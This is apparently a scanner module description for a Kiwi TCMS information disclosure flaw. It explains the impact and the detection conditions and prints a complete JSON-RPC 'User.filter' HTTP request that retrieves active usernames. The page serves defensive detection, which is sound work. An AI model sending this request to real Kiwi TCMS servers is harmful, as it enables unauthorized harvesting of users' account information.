Kiwi TCMS Information Disclosure

What is the "Kiwi TCMS Information Disclosure?"

The "Kiwi TCMS Information Disclosure" module is designed to detect a specific vulnerability in the Kiwi TCMS software. This vulnerability allows for the exposure of sensitive information due to a misconfiguration. The severity of this vulnerability is classified as high.

Impact

If exploited, the "Kiwi TCMS Information Disclosure" vulnerability can result in the unauthorized disclosure of sensitive information. This can include usernames, as well as other data related to active users of the Kiwi TCMS software.

How the module works?

The "Kiwi TCMS Information Disclosure" module works by sending a specific HTTP request to the target system. The request is designed to exploit the misconfiguration in the Kiwi TCMS software and retrieve sensitive information. The module uses the following matching conditions to determine if the vulnerability is present:

- The HTTP response status must be 200. - The response body must contain the words "result", "username", "jsonrpc", and "is_active".

By analyzing the response based on these conditions, the module can determine if the vulnerability exists and report it accordingly.

Example HTTP request:

POST /json-rpc/ HTTP/1.1
Host: <Hostname>
Content-Type: application/json
Accept-Encoding: gzip, deflate

{
  "jsonrpc": "2.0",
  "method": "User.filter",
  "id": 1,
  "params": {
    "query": {
      "is_active": true
    }
  }
}

It is important to note that this module is specifically designed to detect the "Kiwi TCMS Information Disclosure" vulnerability and may not be applicable to other software or systems.